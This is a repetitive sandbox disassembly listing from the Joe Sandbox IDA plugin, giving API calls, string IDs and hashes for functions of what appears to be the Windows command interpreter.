                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
                                                                            • String ID: &()[]{}^=;!%'+,`~
                                                                            • API String ID: 975110957-381716982
                                                                            • Opcode ID: 81ae56d3842748a5f5ad0eef1d8082eb87a6446df097ea146a62e1ffa9f4f130
                                                                            • Instruction ID: 77bed5fe90515f50f242c66ae7d06a4213814f388d2cc26aef0f14416fc8a934
                                                                            • Opcode Fuzzy Hash: 81ae56d3842748a5f5ad0eef1d8082eb87a6446df097ea146a62e1ffa9f4f130
                                                                            • Instruction Fuzzy Hash: 79C1B076A002259BDB249F68E841BEEBBF1FF44710F1544A9E848EB392EF309D41CB54
                                                                            APIs
                                                                            • _tell.MSVCRT ref: 00B0B7F9
                                                                            • _close.MSVCRT ref: 00B0B82C
                                                                            • memset.MSVCRT ref: 00B0B8CC
                                                                            • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 00B0B936
                                                                            • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,00B3C9F0), ref: 00B0B947
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00B0B96D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ConsoleInfoOutput_close_tellmemset
                                                                            • String ID: GOTO
                                                                            • API String ID: 1380661413-1693823284
                                                                            • Opcode ID: 224abbdf3b32072acb9ba8565f02254147215836a502463707c70698439599be
                                                                            • Instruction ID: cd93f291b2cc02c5f2174b691289473d4e1548a56f1e3fcbe58982d1e2ab6860
                                                                            • Opcode Fuzzy Hash: 224abbdf3b32072acb9ba8565f02254147215836a502463707c70698439599be
                                                                            • Instruction Fuzzy Hash: CAB1B271A443018BD724DF24D885B6BBFE6FB84700F5449ADE845972E0EB70DD85CB92
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                                                            • String ID: +-~!
                                                                            • API String ID: 2191331888-2604099254
                                                                            • Opcode ID: a582bf52f803b47a7e933ddb0aabd9bc21395a2d6be4c6398f28841701c8dd4c
                                                                            • Instruction ID: 9fbfe9364d8c6240068362bd799e7a487410e5795dee37e1eee2fe8b3640fece
                                                                            • Opcode Fuzzy Hash: a582bf52f803b47a7e933ddb0aabd9bc21395a2d6be4c6398f28841701c8dd4c
                                                                            • Instruction Fuzzy Hash: FD518971500209EBCB10DF64D8899EA37E5FF06760F9081A6FC06AB150EBB19F90DBA1
                                                                            APIs
                                                                            • towupper.MSVCRT ref: 00B27277
                                                                            • iswalpha.MSVCRT ref: 00B272AA
                                                                            • towupper.MSVCRT ref: 00B272BD
                                                                            • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 00B272EF
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B27304
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B27311
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLasttowupper$InformationVolumeiswalpha
                                                                            • String ID: $%04X-%04X$\
                                                                            • API String ID: 4001382275-467840296
                                                                            • Opcode ID: 413bca5b9831e4df47e8584d31e06f24e498f7c5d8b4c902f9dfe1e2acd389c7
                                                                            • Instruction ID: b1353b5c5bb8a6402382b41cf670a0394873ff8b20e0cca287a9a7153c4cc3e3
                                                                            • Opcode Fuzzy Hash: 413bca5b9831e4df47e8584d31e06f24e498f7c5d8b4c902f9dfe1e2acd389c7
                                                                            • Instruction Fuzzy Hash: F1410B75648310AAD720ABA59C0AEBB77ECEF85B10F04049DF949C71C1EE709A41D7BA
                                                                            APIs
                                                                            • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00B23877), ref: 00B22D31
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSingleWait
                                                                            • String ID: wil
                                                                            • API String ID: 24740636-1589926490
                                                                            • Opcode ID: a89de3bd36a32a96d2cb1c993489db78dec55a0e84f38e21edd4b06e20880a63
                                                                            • Instruction ID: 0d851748519d94ffabe9273b3380567f84687e90b5ed1bec4f4a83524cdd5dec
                                                                            • Opcode Fuzzy Hash: a89de3bd36a32a96d2cb1c993489db78dec55a0e84f38e21edd4b06e20880a63
                                                                            • Instruction Fuzzy Hash: BC317534344224BBFB106B64EC84BBB36DDEF41391F6040B5F419D7290DBB4CE41A662
                                                                            APIs
                                                                            • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001900,00000000,?,00000000,?,0000000A,?), ref: 00B28360
                                                                            • _ultoa.MSVCRT ref: 00B28376
                                                                            • GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(?,000000FF,?,00000020), ref: 00B2838B
                                                                            • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(00000000,00000000), ref: 00B283A0
                                                                            • FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00003100,00000000,0000013D,00000000,?,0000000A,?), ref: 00B283D8
                                                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?), ref: 00B2840C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
                                                                            • String ID: (#$Application$System
                                                                            • API String ID: 3377411628-593978566
                                                                            • Opcode ID: 6b2bd26d100754bdca48c2e4b768dc151939271de29f37c9e7f785cfdc034003
                                                                            • Instruction ID: f4845b118d63130ed6c8064b41e209a79a2b96abc8d25a7fa6de07f53ff28cdd
                                                                            • Opcode Fuzzy Hash: 6b2bd26d100754bdca48c2e4b768dc151939271de29f37c9e7f785cfdc034003
                                                                            • Instruction Fuzzy Hash: 31316D71A00218ABDB10DFA5DC45EEEBBFDFB49B50F104169F915E7191EB309A01CB61
                                                                            APIs
                                                                            • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000004,?,?,00000000,?,?,?,00B15134,-00000001), ref: 00B15294
                                                                            • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00B15134,-00000001), ref: 00B152A4
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000004,?,?,00000000,?,?,?,00B15134,-00000001), ref: 00B21036
                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000004,?,?,00000000,?,?,?,00B15134,-00000001), ref: 00B21048
                                                                            • SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00B15134,-00000001), ref: 00B21064
                                                                            • RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,?,?,?,00000004,?,?,00000000,?,?,?,00B15134,-00000001), ref: 00B21073
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
                                                                            • String ID: :$\
                                                                            • API String ID: 3961617410-1166558509
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B11665
                                                                            • memset.MSVCRT ref: 00B11689
                                                                            • memset.MSVCRT ref: 00B116AD
                                                                            • memset.MSVCRT ref: 00B116D1
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00B117CF
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00B117E9
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00B11801
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000001,?,?,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00B11813
                                                                              • Part of subcall function 00B1260E: GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,00B11775,-00000001,-00000001,-00000001,-00000001), ref: 00B12650
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: memset$BufferConsoleInfoScreen
                                                                            • String ID:
                                                                            • API String ID: 1034426908-0
                                                                            APIs
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,00000001,00B29E02,?,?,00B29E02), ref: 00B24618
                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,00B29E02), ref: 00B24637
                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B3A7F0,00B29E02,?,00000000,?,00B29E02), ref: 00B24646
                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,00B29E02), ref: 00B24653
                                                                            • memcmp.MSVCRT(00B3A7F0,00B034F8,00000003), ref: 00B24693
                                                                            • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00B29E02,00000000,?,00B29E02,?,00B29E02), ref: 00B24720
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,00B29E02,00000000,00000000,?,00B29E02), ref: 00B24742
                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,00B29E02), ref: 00B2474F
                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(?,00B3A7F1,00000001,?,00000000,?,00B29E02), ref: 00B24764
                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04,?,00B29E02), ref: 00B24771
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: FileLockShared$AcquirePointerReadRelease$ByteCharMultiWidememcmp
                                                                            • String ID:
                                                                            • API String ID: 2002953238-0
                                                                            APIs
                                                                            • MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000001,00B3A7F0,00000000,?,00000200), ref: 00B0C818
                                                                            • wcschr.MSVCRT ref: 00B0C882
                                                                            • _get_osfhandle.MSVCRT ref: 00B0C8BA
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B0C8C4
                                                                            • _get_osfhandle.MSVCRT ref: 00B0C8DB
                                                                            • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B0C8ED
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000001), ref: 00B0C90D
                                                                            • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B0C91E
                                                                            • ReadFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00B3A7F0,00000200,00000000,00000000), ref: 00B0C934
                                                                            • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00B48E04), ref: 00B0C941
                                                                            • _get_osfhandle.MSVCRT ref: 00B0CAC4
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 00B0CACE
                                                                            • memcmp.MSVCRT(00B3A7F0,00B034F8,00000003), ref: 00B1D16E
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: File$Pointer_get_osfhandle$LockShared$AcquireByteCharMultiReadReleaseTypeWidememcmpwcschr
                                                                            • String ID:
                                                                            • API String ID: 1383533039-0
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsicmp
                                                                            • String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
                                                                            • API String ID: 2081463915-1668778490
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B09F3A
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
                                                                            • _get_osfhandle.MSVCRT ref: 00B0A02D
                                                                            • _get_osfhandle.MSVCRT ref: 00B0A03F
                                                                            • ??_V@YAXPAX@Z.MSVCRT(?,-00000105,00000001,?,00000001), ref: 00B0A0E8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _get_osfhandlememset
                                                                            • String ID: DPATH
                                                                            • API String ID: 3784859044-2010427443
                                                                            APIs
                                                                            • _get_osfhandle.MSVCRT ref: 00B24A7B
                                                                            • GetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,00000002,?), ref: 00B24B98
                                                                            • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?), ref: 00B24BC5
                                                                            • SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?), ref: 00B24BD2
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B24BDC
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 00B24C30
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: LocalTime$ErrorLast$_get_osfhandle
                                                                            • String ID: %s$/-.
                                                                            • API String ID: 1033501010-531045382
                                                                            APIs
                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?), ref: 00B26745
                                                                            • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,02000000,00000000,?,?), ref: 00B267CF
                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00B267F6
                                                                            • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00B020B8,00000000,00000002,?,00000000), ref: 00B26867
                                                                            • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000), ref: 00B268A3
                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 00B268C5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CloseValue$CreateDeleteOpen
                                                                            • String ID: %s=%s$\Shell\Open\Command
                                                                            • API String ID: 4081037667-3301834661
                                                                            APIs
                                                                            • RegCreateKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00B2CD00,00000018,?,?,00B1BFD6), ref: 00B2650F
                                                                            • RegSetValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,00000000,00000000,00000001,?,00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00B2CD00), ref: 00B26545
                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000,?,?,00000000,00000000,00000000,00000002,00000000,?,00000000,00B2CD00,00000018,?,?,00B1BFD6), ref: 00B26553
                                                                            • RegDeleteKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000000,00B2CD00,00000018,?,?,00B1BFD6), ref: 00B26590
                                                                            • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,00B2CD00,00000018,?,?,00B1BFD6), ref: 00B265AD
                                                                            • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00B020B8,?,00000000,02000000,?,?,?,00000000,00000000,00B2CD00,00000018,?,?,00B1BFD6), ref: 00B265D4
                                                                            • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,02000000,?,?,?,00000000,00000000,00B2CD00,00000018,?,?,00B1BFD6), ref: 00B265EF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: CloseDeleteValue$CreateOpen
                                                                            • String ID: %s=%s
                                                                            • API String ID: 1019019434-1087296587
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.1769537399.0000000000B01000.00000020.00000001.01000000.00000006.sdmp, Offset: 00B00000, based on PE: true
                                                                            • Associated: 00000005.00000002.1769522491.0000000000B00000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769560262.0000000000B2E000.00000004.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4A000.00000002.00000001.01000000.00000006.sdmp
                                                                            • Associated: 00000005.00000002.1769577495.0000000000B4E000.00000002.00000001.01000000.00000006.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b00000_alpha.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsnicmpswscanf
                                                                            • String ID: :EOF
                                                                            APIs
                                                                            • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(NTDLL.DLL,00000000,00000000,?,00000000,?), ref: 00B26069
                                                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,NtQueryInformationProcess), ref: 00B2607E
                                                                            • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000480,?), ref: 00B260DC
                                                                            • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000004,00000000), ref: 00B26128
                                                                            • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,?,?,00000002,00000000), ref: 00B2614F
                                                                            • ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0(?,00000000,?,00000002,00000000), ref: 00B26186
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MemoryProcessRead$AddressLibraryLoadProc
                                                                            • String ID: NTDLL.DLL$NtQueryInformationProcess
                                                                            APIs
                                                                            • _wcsicmp.MSVCRT ref: 00B165A4
                                                                            • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,80000000,00000001,00000000,00000003,08000080,00000000), ref: 00B165D7
                                                                            • _open_osfhandle.MSVCRT ref: 00B165EB
                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,?), ref: 00B22092
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
                                                                            • String ID: con
                                                                            APIs
                                                                            • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00000104), ref: 00B261D7
                                                                            • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,00000000,00000000,00000040), ref: 00B26211
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,00000014,00000004), ref: 00B26254
                                                                            • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00B2625B
                                                                            • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 00B2628D
                                                                            • RtlFreeHeap.NTDLL ref: 00B26294
                                                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000,00000040), ref: 00B2629B
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Heap$FileProcess$AllocCloseCreateFreeHandlePointer
                                                                            • String ID: PE
                                                                            APIs
                                                                            • _wcsicmp.MSVCRT ref: 00B08FCD
                                                                            • _wcsicmp.MSVCRT ref: 00B08FE3
                                                                            • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 00B09002
                                                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00B09013
                                                                              • Part of subcall function 00B0A62F: wcschr.MSVCRT ref: 00B0A635
                                                                            Similarity
                                                                            • API ID: _wcsicmp$AttributesErrorFileLastwcschr
                                                                            • String ID:
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00B08060
                                                                              • Part of subcall function 00B0E3F0: memset.MSVCRT ref: 00B0E455
